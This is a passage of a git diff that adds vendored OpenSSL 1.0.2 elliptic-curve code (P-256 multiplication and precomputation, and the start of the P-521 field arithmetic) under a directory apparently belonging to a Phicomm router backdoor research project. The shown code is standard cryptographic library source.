+         * i.e., they contribute nothing to the linear combination
+         */
+        memset(secrets, 0, num_points * sizeof(felem_bytearray));
+        memset(pre_comp, 0, num_points * 17 * 3 * sizeof(smallfelem));
+        for (i = 0; i < num_points; ++i) {
+            if (i == num)
+                /*
+                 * we didn't have a valid precomputation, so we pick the
+                 * generator
+                 */
+            {
+                p = EC_GROUP_get0_generator(group);
+                p_scalar = scalar;
+            } else
+                /* the i^th point */
+            {
+                p = points[i];
+                p_scalar = scalars[i];
+            }
+            if ((p_scalar != NULL) && (p != NULL)) {
+                /* reduce scalar to 0 <= scalar < 2^256 */
+                if ((BN_num_bits(p_scalar) > 256)
+                    || (BN_is_negative(p_scalar))) {
+                    /*
+                     * this is an unusual input, and we don't guarantee
+                     * constant-timeness
+                     */
+                    if (!BN_nnmod(tmp_scalar, p_scalar, &group->order, ctx)) {
+                        ECerr(EC_F_EC_GFP_NISTP256_POINTS_MUL, ERR_R_BN_LIB);
+                        goto err;
+                    }
+                    num_bytes = BN_bn2bin(tmp_scalar, tmp);
+                } else
+                    num_bytes = BN_bn2bin(p_scalar, tmp);
+                flip_endian(secrets[i], tmp, num_bytes);
+                /* precompute multiples */
+                if ((!BN_to_felem(x_out, &p->X)) ||
+                    (!BN_to_felem(y_out, &p->Y)) ||
+                    (!BN_to_felem(z_out, &p->Z)))
+                    goto err;
+                felem_shrink(pre_comp[i][1][0], x_out);
+                felem_shrink(pre_comp[i][1][1], y_out);
+                felem_shrink(pre_comp[i][1][2], z_out);
+                for (j = 2; j <= 16; ++j) {
+                    if (j & 1) {
+                        point_add_small(pre_comp[i][j][0], pre_comp[i][j][1],
+                                        pre_comp[i][j][2], pre_comp[i][1][0],
+                                        pre_comp[i][1][1], pre_comp[i][1][2],
+                                        pre_comp[i][j - 1][0],
+                                        pre_comp[i][j - 1][1],
+                                        pre_comp[i][j - 1][2]);
+                    } else {
+                        point_double_small(pre_comp[i][j][0],
+                                           pre_comp[i][j][1],
+                                           pre_comp[i][j][2],
+                                           pre_comp[i][j / 2][0],
+                                           pre_comp[i][j / 2][1],
+                                           pre_comp[i][j / 2][2]);
+                    }
+                }
+            }
+        }
+        if (mixed)
+            make_points_affine(num_points * 17, pre_comp[0], tmp_smallfelems);
+    }
+
+    /* the scalar for the generator */
+    if ((scalar != NULL) && (have_pre_comp)) {
+        memset(g_secret, 0, sizeof(g_secret));
+        /* reduce scalar to 0 <= scalar < 2^256 */
+        if ((BN_num_bits(scalar) > 256) || (BN_is_negative(scalar))) {
+            /*
+             * this is an unusual input, and we don't guarantee
+             * constant-timeness
+             */
+            if (!BN_nnmod(tmp_scalar, scalar, &group->order, ctx)) {
+                ECerr(EC_F_EC_GFP_NISTP256_POINTS_MUL, ERR_R_BN_LIB);
+                goto err;
+            }
+            num_bytes = BN_bn2bin(tmp_scalar, tmp);
+        } else
+            num_bytes = BN_bn2bin(scalar, tmp);
+        flip_endian(g_secret, tmp, num_bytes);
+        /* do the multiplication with generator precomputation */
+        batch_mul(x_out, y_out, z_out,
+                  (const felem_bytearray(*))secrets, num_points,
+                  g_secret,
+                  mixed, (const smallfelem(*)[17][3])pre_comp, g_pre_comp);
+    } else
+        /* do the multiplication without generator precomputation */
+        batch_mul(x_out, y_out, z_out,
+                  (const felem_bytearray(*))secrets, num_points,
+                  NULL, mixed, (const smallfelem(*)[17][3])pre_comp, NULL);
+    /* reduce the output to its unique minimal representation */
+    felem_contract(x_in, x_out);
+    felem_contract(y_in, y_out);
+    felem_contract(z_in, z_out);
+    if ((!smallfelem_to_BN(x, x_in)) || (!smallfelem_to_BN(y, y_in)) ||
+        (!smallfelem_to_BN(z, z_in))) {
+        ECerr(EC_F_EC_GFP_NISTP256_POINTS_MUL, ERR_R_BN_LIB);
+        goto err;
+    }
+    ret = EC_POINT_set_Jprojective_coordinates_GFp(group, r, x, y, z, ctx);
+
+ err:
+    BN_CTX_end(ctx);
+    if (generator != NULL)
+        EC_POINT_free(generator);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (secrets != NULL)
+        OPENSSL_free(secrets);
+    if (pre_comp != NULL)
+        OPENSSL_free(pre_comp);
+    if (tmp_smallfelems != NULL)
+        OPENSSL_free(tmp_smallfelems);
+    return ret;
+}
+
+int ec_GFp_nistp256_precompute_mult(EC_GROUP *group, BN_CTX *ctx)
+{
+    int ret = 0;
+    NISTP256_PRE_COMP *pre = NULL;
+    int i, j;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y;
+    EC_POINT *generator = NULL;
+    smallfelem tmp_smallfelems[32];
+    felem x_tmp, y_tmp, z_tmp;
+
+    /* throw away old precomputation */
+    EC_EX_DATA_free_data(&group->extra_data, nistp256_pre_comp_dup,
+                         nistp256_pre_comp_free,
+                         nistp256_pre_comp_clear_free);
+    if (ctx == NULL)
+        if ((ctx = new_ctx = BN_CTX_new()) == NULL)
+            return 0;
+    BN_CTX_start(ctx);
+    if (((x = BN_CTX_get(ctx)) == NULL) || ((y = BN_CTX_get(ctx)) == NULL))
+        goto err;
+    /* get the generator */
+    if (group->generator == NULL)
+        goto err;
+    generator = EC_POINT_new(group);
+    if (generator == NULL)
+        goto err;
+    BN_bin2bn(nistp256_curve_params[3], sizeof(felem_bytearray), x);
+    BN_bin2bn(nistp256_curve_params[4], sizeof(felem_bytearray), y);
+    if (!EC_POINT_set_affine_coordinates_GFp(group, generator, x, y, ctx))
+        goto err;
+    if ((pre = nistp256_pre_comp_new()) == NULL)
+        goto err;
+    /*
+     * if the generator is the standard one, use built-in precomputation
+     */
+    if (0 == EC_POINT_cmp(group, generator, group->generator, ctx)) {
+        memcpy(pre->g_pre_comp, gmul, sizeof(pre->g_pre_comp));
+        ret = 1;
+        goto err;
+    }
+    if ((!BN_to_felem(x_tmp, &group->generator->X)) ||
+        (!BN_to_felem(y_tmp, &group->generator->Y)) ||
+        (!BN_to_felem(z_tmp, &group->generator->Z)))
+        goto err;
+    felem_shrink(pre->g_pre_comp[0][1][0], x_tmp);
+    felem_shrink(pre->g_pre_comp[0][1][1], y_tmp);
+    felem_shrink(pre->g_pre_comp[0][1][2], z_tmp);
+    /*
+     * compute 2^64*G, 2^128*G, 2^192*G for the first table, 2^32*G, 2^96*G,
+     * 2^160*G, 2^224*G for the second one
+     */
+    for (i = 1; i <= 8; i <<= 1) {
+        point_double_small(pre->g_pre_comp[1][i][0], pre->g_pre_comp[1][i][1],
+                           pre->g_pre_comp[1][i][2], pre->g_pre_comp[0][i][0],
+                           pre->g_pre_comp[0][i][1],
+                           pre->g_pre_comp[0][i][2]);
+        for (j = 0; j < 31; ++j) {
+            point_double_small(pre->g_pre_comp[1][i][0],
+                               pre->g_pre_comp[1][i][1],
+                               pre->g_pre_comp[1][i][2],
+                               pre->g_pre_comp[1][i][0],
+                               pre->g_pre_comp[1][i][1],
+                               pre->g_pre_comp[1][i][2]);
+        }
+        if (i == 8)
+            break;
+        point_double_small(pre->g_pre_comp[0][2 * i][0],
+                           pre->g_pre_comp[0][2 * i][1],
+                           pre->g_pre_comp[0][2 * i][2],
+                           pre->g_pre_comp[1][i][0], pre->g_pre_comp[1][i][1],
+                           pre->g_pre_comp[1][i][2]);
+        for (j = 0; j < 31; ++j) {
+            point_double_small(pre->g_pre_comp[0][2 * i][0],
+                               pre->g_pre_comp[0][2 * i][1],
+                               pre->g_pre_comp[0][2 * i][2],
+                               pre->g_pre_comp[0][2 * i][0],
+                               pre->g_pre_comp[0][2 * i][1],
+                               pre->g_pre_comp[0][2 * i][2]);
+        }
+    }
+    for (i = 0; i < 2; i++) {
+        /* g_pre_comp[i][0] is the point at infinity */
+        memset(pre->g_pre_comp[i][0], 0, sizeof(pre->g_pre_comp[i][0]));
+        /* the remaining multiples */
+        /* 2^64*G + 2^128*G resp. 2^96*G + 2^160*G */
+        point_add_small(pre->g_pre_comp[i][6][0], pre->g_pre_comp[i][6][1],
+                        pre->g_pre_comp[i][6][2], pre->g_pre_comp[i][4][0],
+                        pre->g_pre_comp[i][4][1], pre->g_pre_comp[i][4][2],
+                        pre->g_pre_comp[i][2][0], pre->g_pre_comp[i][2][1],
+                        pre->g_pre_comp[i][2][2]);
+        /* 2^64*G + 2^192*G resp. 2^96*G + 2^224*G */
+        point_add_small(pre->g_pre_comp[i][10][0], pre->g_pre_comp[i][10][1],
+                        pre->g_pre_comp[i][10][2], pre->g_pre_comp[i][8][0],
+                        pre->g_pre_comp[i][8][1], pre->g_pre_comp[i][8][2],
+                        pre->g_pre_comp[i][2][0], pre->g_pre_comp[i][2][1],
+                        pre->g_pre_comp[i][2][2]);
+        /* 2^128*G + 2^192*G resp. 2^160*G + 2^224*G */
+        point_add_small(pre->g_pre_comp[i][12][0], pre->g_pre_comp[i][12][1],
+                        pre->g_pre_comp[i][12][2], pre->g_pre_comp[i][8][0],
+                        pre->g_pre_comp[i][8][1], pre->g_pre_comp[i][8][2],
+                        pre->g_pre_comp[i][4][0], pre->g_pre_comp[i][4][1],
+                        pre->g_pre_comp[i][4][2]);
+        /*
+         * 2^64*G + 2^128*G + 2^192*G resp. 2^96*G + 2^160*G + 2^224*G
+         */
+        point_add_small(pre->g_pre_comp[i][14][0], pre->g_pre_comp[i][14][1],
+                        pre->g_pre_comp[i][14][2], pre->g_pre_comp[i][12][0],
+                        pre->g_pre_comp[i][12][1], pre->g_pre_comp[i][12][2],
+                        pre->g_pre_comp[i][2][0], pre->g_pre_comp[i][2][1],
+                        pre->g_pre_comp[i][2][2]);
+        for (j = 1; j < 8; ++j) {
+            /* odd multiples: add G resp. 2^32*G */
+            point_add_small(pre->g_pre_comp[i][2 * j + 1][0],
+                            pre->g_pre_comp[i][2 * j + 1][1],
+                            pre->g_pre_comp[i][2 * j + 1][2],
+                            pre->g_pre_comp[i][2 * j][0],
+                            pre->g_pre_comp[i][2 * j][1],
+                            pre->g_pre_comp[i][2 * j][2],
+                            pre->g_pre_comp[i][1][0],
+                            pre->g_pre_comp[i][1][1],
+                            pre->g_pre_comp[i][1][2]);
+        }
+    }
+    make_points_affine(31, &(pre->g_pre_comp[0][1]), tmp_smallfelems);
+
+    if (!EC_EX_DATA_set_data(&group->extra_data, pre, nistp256_pre_comp_dup,
+                             nistp256_pre_comp_free,
+                             nistp256_pre_comp_clear_free))
+        goto err;
+    ret = 1;
+    pre = NULL;
+ err:
+    BN_CTX_end(ctx);
+    if (generator != NULL)
+        EC_POINT_free(generator);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    if (pre)
+        nistp256_pre_comp_free(pre);
+    return ret;
+}
+
+int ec_GFp_nistp256_have_precompute_mult(const EC_GROUP *group)
+{
+    if (EC_EX_DATA_get_data(group->extra_data, nistp256_pre_comp_dup,
+                            nistp256_pre_comp_free,
+                            nistp256_pre_comp_clear_free)
+        != NULL)
+        return 1;
+    else
+        return 0;
+}
+#else
+static void *dummy = &dummy;
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp521.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp521.c
new file mode 100644
index 0000000..360b9a3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistp521.c
@@ -0,0 +1,2148 @@
+/* crypto/ec/ecp_nistp521.c */
+/*
+ * Written by Adam Langley (Google) for the OpenSSL project
+ */
+/* Copyright 2011 Google Inc.
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ *
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ *  Unless required by applicable law or agreed to in writing, software
+ *  distributed under the License is distributed on an "AS IS" BASIS,
+ *  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ *  See the License for the specific language governing permissions and
+ *  limitations under the License.
+ */
+
+/*
+ * A 64-bit implementation of the NIST P-521 elliptic curve point multiplication
+ *
+ * OpenSSL integration was taken from Emilia Kasper's work in ecp_nistp224.c.
+ * Otherwise based on Emilia's P224 work, which was inspired by my curve25519
+ * work which got its smarts from Daniel J. Bernstein's work on the same.
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+
+# ifndef OPENSSL_SYS_VMS
+#  include <stdint.h>
+# else
+#  include <inttypes.h>
+# endif
+
+# include <string.h>
+# include <openssl/err.h>
+# include "ec_lcl.h"
+
+# if defined(__GNUC__) && (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 1))
+  /* even with gcc, the typedef won't work for 32-bit platforms */
+typedef __uint128_t uint128_t;  /* nonstandard; implemented by gcc on 64-bit
+                                 * platforms */
+# else
+#  error "Need GCC 3.1 or later to define type uint128_t"
+# endif
+
+typedef uint8_t u8;
+typedef uint64_t u64;
+typedef int64_t s64;
+
+/*
+ * The underlying field. P521 operates over GF(2^521-1). We can serialise an
+ * element of this field into 66 bytes where the most significant byte
+ * contains only a single bit. We call this an felem_bytearray.
+ */
+
+typedef u8 felem_bytearray[66];
+
+/*
+ * These are the parameters of P521, taken from FIPS 186-3, section D.1.2.5.
+ * These values are big-endian.
+ */
+static const felem_bytearray nistp521_curve_params[5] = {
+    {0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, /* p */
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff},
+    {0x01, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, /* a = -3 */
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
+     0xff, 0xfc},
+    {0x00, 0x51, 0x95, 0x3e, 0xb9, 0x61, 0x8e, 0x1c, /* b */
+     0x9a, 0x1f, 0x92, 0x9a, 0x21, 0xa0, 0xb6, 0x85,
+     0x40, 0xee, 0xa2, 0xda, 0x72, 0x5b, 0x99, 0xb3,
+     0x15, 0xf3, 0xb8, 0xb4, 0x89, 0x91, 0x8e, 0xf1,
+     0x09, 0xe1, 0x56, 0x19, 0x39, 0x51, 0xec, 0x7e,
+     0x93, 0x7b, 0x16, 0x52, 0xc0, 0xbd, 0x3b, 0xb1,
+     0xbf, 0x07, 0x35, 0x73, 0xdf, 0x88, 0x3d, 0x2c,
+     0x34, 0xf1, 0xef, 0x45, 0x1f, 0xd4, 0x6b, 0x50,
+     0x3f, 0x00},
+    {0x00, 0xc6, 0x85, 0x8e, 0x06, 0xb7, 0x04, 0x04, /* x */
+     0xe9, 0xcd, 0x9e, 0x3e, 0xcb, 0x66, 0x23, 0x95,
+     0xb4, 0x42, 0x9c, 0x64, 0x81, 0x39, 0x05, 0x3f,
+     0xb5, 0x21, 0xf8, 0x28, 0xaf, 0x60, 0x6b, 0x4d,
+     0x3d, 0xba, 0xa1, 0x4b, 0x5e, 0x77, 0xef, 0xe7,
+     0x59, 0x28, 0xfe, 0x1d, 0xc1, 0x27, 0xa2, 0xff,
+     0xa8, 0xde, 0x33, 0x48, 0xb3, 0xc1, 0x85, 0x6a,
+     0x42, 0x9b, 0xf9, 0x7e, 0x7e, 0x31, 0xc2, 0xe5,
+     0xbd, 0x66},
+    {0x01, 0x18, 0x39, 0x29, 0x6a, 0x78, 0x9a, 0x3b, /* y */
+     0xc0, 0x04, 0x5c, 0x8a, 0x5f, 0xb4, 0x2c, 0x7d,
+     0x1b, 0xd9, 0x98, 0xf5, 0x44, 0x49, 0x57, 0x9b,
+     0x44, 0x68, 0x17, 0xaf, 0xbd, 0x17, 0x27, 0x3e,
+     0x66, 0x2c, 0x97, 0xee, 0x72, 0x99, 0x5e, 0xf4,
+     0x26, 0x40, 0xc5, 0x50, 0xb9, 0x01, 0x3f, 0xad,
+     0x07, 0x61, 0x35, 0x3c, 0x70, 0x86, 0xa2, 0x72,
+     0xc2, 0x40, 0x88, 0xbe, 0x94, 0x76, 0x9f, 0xd1,
+     0x66, 0x50}
+};
+
+/*-
+ * The representation of field elements.
+ * ------------------------------------
+ *
+ * We represent field elements with nine values. These values are either 64 or
+ * 128 bits and the field element represented is:
+ *   v[0]*2^0 + v[1]*2^58 + v[2]*2^116 + ... + v[8]*2^464  (mod p)
+ * Each of the nine values is called a 'limb'. Since the limbs are spaced only
+ * 58 bits apart, but are greater than 58 bits in length, the most significant
+ * bits of each limb overlap with the least significant bits of the next.
+ *
+ * A field element with 64-bit limbs is an 'felem'. One with 128-bit limbs is a
+ * 'largefelem' */
+
+# define NLIMBS 9
+
+typedef uint64_t limb;
+typedef limb felem[NLIMBS];
+typedef uint128_t largefelem[NLIMBS];
+
+static const limb bottom57bits = 0x1ffffffffffffff;
+static const limb bottom58bits = 0x3ffffffffffffff;
+
+/*
+ * bin66_to_felem takes a little-endian byte array and converts it into felem
+ * form. This assumes that the CPU is little-endian.
+ */
+static void bin66_to_felem(felem out, const u8 in[66])
+{
+    out[0] = (*((limb *) & in[0])) & bottom58bits;
+    out[1] = (*((limb *) & in[7]) >> 2) & bottom58bits;
+    out[2] = (*((limb *) & in[14]) >> 4) & bottom58bits;
+    out[3] = (*((limb *) & in[21]) >> 6) & bottom58bits;
+    out[4] = (*((limb *) & in[29])) & bottom58bits;
+    out[5] = (*((limb *) & in[36]) >> 2) & bottom58bits;
+    out[6] = (*((limb *) & in[43]) >> 4) & bottom58bits;
+    out[7] = (*((limb *) & in[50]) >> 6) & bottom58bits;
+    out[8] = (*((limb *) & in[58])) & bottom57bits;
+}
+
+/*
+ * felem_to_bin66 takes an felem and serialises into a little endian, 66 byte
+ * array. This assumes that the CPU is little-endian.
+ */
+static void felem_to_bin66(u8 out[66], const felem in)
+{
+    memset(out, 0, 66);
+    (*((limb *) & out[0])) = in[0];
+    (*((limb *) & out[7])) |= in[1] << 2;
+    (*((limb *) & out[14])) |= in[2] << 4;
+    (*((limb *) & out[21])) |= in[3] << 6;
+    (*((limb *) & out[29])) = in[4];
+    (*((limb *) & out[36])) |= in[5] << 2;
+    (*((limb *) & out[43])) |= in[6] << 4;
+    (*((limb *) & out[50])) |= in[7] << 6;
+    (*((limb *) & out[58])) = in[8];
+}
+
+/* To preserve endianness when using BN_bn2bin and BN_bin2bn */
+static void flip_endian(u8 *out, const u8 *in, unsigned len)
+{
+    unsigned i;
+    for (i = 0; i < len; ++i)
+        out[i] = in[len - 1 - i];
+}
+
+/* BN_to_felem converts an OpenSSL BIGNUM into an felem */
+static int BN_to_felem(felem out, const BIGNUM *bn)
+{
+    felem_bytearray b_in;
+    felem_bytearray b_out;
+    unsigned num_bytes;
+
+    /* BN_bn2bin eats leading zeroes */
+    memset(b_out, 0, sizeof b_out);
+    num_bytes = BN_num_bytes(bn);
+    if (num_bytes > sizeof b_out) {
+        ECerr(EC_F_BN_TO_FELEM, EC_R_BIGNUM_OUT_OF_RANGE);
+        return 0;
+    }
+    if (BN_is_negative(bn)) {
+        ECerr(EC_F_BN_TO_FELEM, EC_R_BIGNUM_OUT_OF_RANGE);
+        return 0;
+    }
+    num_bytes = BN_bn2bin(bn, b_in);
+    flip_endian(b_out, b_in, num_bytes);
+    bin66_to_felem(out, b_out);
+    return 1;
+}
+
+/* felem_to_BN converts an felem into an OpenSSL BIGNUM */
+static BIGNUM *felem_to_BN(BIGNUM *out, const felem in)
+{
+    felem_bytearray b_in, b_out;
+    felem_to_bin66(b_in, in);
+    flip_endian(b_out, b_in, sizeof b_out);
+    return BN_bin2bn(b_out, sizeof b_out, out);
+}
+
+/*-
+ * Field operations
+ * ----------------
+ */
+
+static void felem_one(felem out)
+{
+    out[0] = 1;
+    out[1] = 0;
+    out[2] = 0;
+    out[3] = 0;
+    out[4] = 0;
+    out[5] = 0;
+    out[6] = 0;
+    out[7] = 0;
+    out[8] = 0;
+}
+
+static void felem_assign(felem out, const felem in)
+{
+    out[0] = in[0];
+    out[1] = in[1];
+    out[2] = in[2];
+    out[3] = in[3];
+    out[4] = in[4];
+    out[5] = in[5];
+    out[6] = in[6];
+    out[7] = in[7];
+    out[8] = in[8];
+}
+
+/* felem_sum64 sets out = out + in. */
+static void felem_sum64(felem out, const felem in)
+{
+    out[0] += in[0];
+    out[1] += in[1];
+    out[2] += in[2];
+    out[3] += in[3];
+    out[4] += in[4];
+    out[5] += in[5];
+    out[6] += in[6];
+    out[7] += in[7];
+    out[8] += in[8];
+}
+
+/* felem_scalar sets out = in * scalar */
+static void felem_scalar(felem out, const felem in, limb scalar)
+{
+    out[0] = in[0] * scalar;
+    out[1] = in[1] * scalar;
+    out[2] = in[2] * scalar;
+    out[3] = in[3] * scalar;
+    out[4] = in[4] * scalar;
+    out[5] = in[5] * scalar;
+    out[6] = in[6] * scalar;
+    out[7] = in[7] * scalar;
+    out[8] = in[8] * scalar;
+}
+
+/* felem_scalar64 sets out = out * scalar */
+static void felem_scalar64(felem out, limb scalar)
+{
+    out[0] *= scalar;
+    out[1] *= scalar;
+    out[2] *= scalar;
+    out[3] *= scalar;
+    out[4] *= scalar;
+    out[5] *= scalar;
+    out[6] *= scalar;
+    out[7] *= scalar;
+    out[8] *= scalar;
+}
+
+/* felem_scalar128 sets out = out * scalar */
+static void felem_scalar128(largefelem out, limb scalar)
+{
+    out[0] *= scalar;
+    out[1] *= scalar;
+    out[2] *= scalar;
+    out[3] *= scalar;
+    out[4] *= scalar;
+    out[5] *= scalar;
+    out[6] *= scalar;
+    out[7] *= scalar;
+    out[8] *= scalar;
+}
+
+/*-
+ * felem_neg sets |out| to |-in|
+ * On entry:
+ *   in[i] < 2^59 + 2^14
+ * On exit:
+ *   out[i] < 2^62
+ */
+static void felem_neg(felem out, const felem in)
+{
+    /* In order to prevent underflow, we subtract from 0 mod p. */
+    static const limb two62m3 = (((limb) 1) << 62) - (((limb) 1) << 5);
+    static const limb two62m2 = (((limb) 1) << 62) - (((limb) 1) << 4);
+
+    out[0] = two62m3 - in[0];
+    out[1] = two62m2 - in[1];
+    out[2] = two62m2 - in[2];
+    out[3] = two62m2 - in[3];
+    out[4] = two62m2 - in[4];
+    out[5] = two62m2 - in[5];
+    out[6] = two62m2 - in[6];
+    out[7] = two62m2 - in[7];
+    out[8] = two62m2 - in[8];
+}
+
+/*-
+ * felem_diff64 subtracts |in| from |out|
+ * On entry:
+ *   in[i] < 2^59 + 2^14
+ * On exit:
+ *   out[i] < out[i] + 2^62
+ */
+static void felem_diff64(felem out, const felem in)
+{
+    /*
+     * In order to prevent underflow, we add 0 mod p before subtracting.
+     */
+    static const limb two62m3 = (((limb) 1) << 62) - (((limb) 1) << 5);
+    static const limb two62m2 = (((limb) 1) << 62) - (((limb) 1) << 4);
+
+    out[0] += two62m3 - in[0];
+    out[1] += two62m2 - in[1];
+    out[2] += two62m2 - in[2];
+    out[3] += two62m2 - in[3];
+    out[4] += two62m2 - in[4];
+    out[5] += two62m2 - in[5];
+    out[6] += two62m2 - in[6];
+    out[7] += two62m2 - in[7];
+    out[8] += two62m2 - in[8];
+}
+
+/*-
+ * felem_diff_128_64 subtracts |in| from |out|
+ * On entry:
+ *   in[i] < 2^62 + 2^17
+ * On exit:
+ *   out[i] < out[i] + 2^63
+ */
+static void felem_diff_128_64(largefelem out, const felem in)
+{
+    /*
+     * In order to prevent underflow, we add 0 mod p before subtracting.
+     */
+    static const limb two63m6 = (((limb) 1) << 62) - (((limb) 1) << 5);
+    static const limb two63m5 = (((limb) 1) << 62) - (((limb) 1) << 4);
+
+    out[0] += two63m6 - in[0];
+    out[1] += two63m5 - in[1];
+    out[2] += two63m5 - in[2];
+    out[3] += two63m5 - in[3];
+    out[4] += two63m5 - in[4];
+    out[5] += two63m5 - in[5];
+    out[6] += two63m5 - in[6];
+    out[7] += two63m5 - in[7];
+    out[8] += two63m5 - in[8];
+}
+
+/*-
+ * felem_diff_128_64 subtracts |in| from |out|
+ * On entry:
+ *   in[i] < 2^126
+ * On exit:
+ *   out[i] < out[i] + 2^127 - 2^69
+ */
+static void felem_diff128(largefelem out, const largefelem in)
+{
+    /*
+     * In order to prevent underflow, we add 0 mod p before subtracting.
+     */
+    static const uint128_t two127m70 =
+        (((uint128_t) 1) << 127) - (((uint128_t) 1) << 70);
+    static const uint128_t two127m69 =
+        (((uint128_t) 1) << 127) - (((uint128_t) 1) << 69);
+
+    out[0] += (two127m70 - in[0]);
+    out[1] += (two127m69 - in[1]);
+    out[2] += (two127m69 - in[2]);
+    out[3] += (two127m69 - in[3]);
+    out[4] += (two127m69 - in[4]);
+    out[5] += (two127m69 - in[5]);
+    out[6] += (two127m69 - in[6]);
+    out[7] += (two127m69 - in[7]);
+    out[8] += (two127m69 - in[8]);
+}
+
+/*-
+ * felem_square sets |out| = |in|^2
+ * On entry:
+ *   in[i] < 2^62
+ * On exit:
+ *   out[i] < 17 * max(in[i]) * max(in[i])
+ */
+static void felem_square(largefelem out, const felem in)
+{
+    felem inx2, inx4;
+    felem_scalar(inx2, in, 2);
+    felem_scalar(inx4, in, 4);
+
+    /*-
+     * We have many cases were we want to do
+     *   in[x] * in[y] +
+     *   in[y] * in[x]
+     * This is obviously just
+     *   2 * in[x] * in[y]
+     * However, rather than do the doubling on the 128 bit result, we
+     * double one of the inputs to the multiplication by reading from
+     * |inx2|
+     */
+
+    out[0] = ((uint128_t) in[0]) * in[0];
+    out[1] = ((uint128_t) in[0]) * inx2[1];
+    out[2] = ((uint128_t) in[0]) * inx2[2] + ((uint128_t) in[1]) * in[1];
+    out[3] = ((uint128_t) in[0]) * inx2[3] + ((uint128_t) in[1]) * inx2[2];
+    out[4] = ((uint128_t) in[0]) * inx2[4] +
+        ((uint128_t) in[1]) * inx2[3] + ((uint128_t) in[2]) * in[2];
+    out[5] = ((uint128_t) in[0]) * inx2[5] +
+        ((uint128_t) in[1]) * inx2[4] + ((uint128_t) in[2]) * inx2[3];
+    out[6] = ((uint128_t) in[0]) * inx2[6] +
+        ((uint128_t) in[1]) * inx2[5] +
+        ((uint128_t) in[2]) * inx2[4] + ((uint128_t) in[3]) * in[3];
+    out[7] = ((uint128_t) in[0]) * inx2[7] +
+        ((uint128_t) in[1]) * inx2[6] +
+        ((uint128_t) in[2]) * inx2[5] + ((uint128_t) in[3]) * inx2[4];
+    out[8] = ((uint128_t) in[0]) * inx2[8] +
+        ((uint128_t) in[1]) * inx2[7] +
+        ((uint128_t) in[2]) * inx2[6] +
+        ((uint128_t) in[3]) * inx2[5] + ((uint128_t) in[4]) * in[4];
+
+    /*
+     * The remaining limbs fall above 2^521, with the first falling at 2^522.
+     * They correspond to locations one bit up from the limbs produced above
+     * so we would have to multiply by two to align them. Again, rather than
+     * operate on the 128-bit result, we double one of the inputs to the
+     * multiplication. If we want to double for both this reason, and the
+     * reason above, then we end up multiplying by four.
+     */
+
+    /* 9 */
+    out[0] += ((uint128_t) in[1]) * inx4[8] +
+        ((uint128_t) in[2]) * inx4[7] +
+        ((uint128_t) in[3]) * inx4[6] + ((uint128_t) in[4]) * inx4[5];
+
+    /* 10 */
+    out[1] += ((uint128_t) in[2]) * inx4[8] +
+        ((uint128_t) in[3]) * inx4[7] +
+        ((uint128_t) in[4]) * inx4[6] + ((uint128_t) in[5]) * inx2[5];
+
+    /* 11 */
+    out[2] += ((uint128_t) in[3]) * inx4[8] +
+        ((uint128_t) in[4]) * inx4[7] + ((uint128_t) in[5]) * inx4[6];
+
+    /* 12 */
+    out[3] += ((uint128_t) in[4]) * inx4[8] +
+        ((uint128_t) in[5]) * inx4[7] + ((uint128_t) in[6]) * inx2[6];
+
+    /* 13 */
+    out[4] += ((uint128_t) in[5]) * inx4[8] + ((uint128_t) in[6]) * inx4[7];
+
+    /* 14 */
+    out[5] += ((uint128_t) in[6]) * inx4[8] + ((uint128_t) in[7]) * inx2[7];
+
+    /* 15 */
+    out[6] += ((uint128_t) in[7]) * inx4[8];
+
+    /* 16 */
+    out[7] += ((uint128_t) in[8]) * inx2[8];
+}
+
+/*-
+ * felem_mul sets |out| = |in1| * |in2|
+ * On entry:
+ *   in1[i] < 2^64
+ *   in2[i] < 2^63
+ * On exit:
+ *   out[i] < 17 * max(in1[i]) * max(in2[i])
+ */
+static void felem_mul(largefelem out, const felem in1, const felem in2)
+{
+    felem in2x2;
+    felem_scalar(in2x2, in2, 2);
+
+    out[0] = ((uint128_t) in1[0]) * in2[0];
+
+    out[1] = ((uint128_t) in1[0]) * in2[1] + ((uint128_t) in1[1]) * in2[0];
+
+    out[2] = ((uint128_t) in1[0]) * in2[2] +
+        ((uint128_t) in1[1]) * in2[1] + ((uint128_t) in1[2]) * in2[0];
+
+    out[3] = ((uint128_t) in1[0]) * in2[3] +
+        ((uint128_t) in1[1]) * in2[2] +
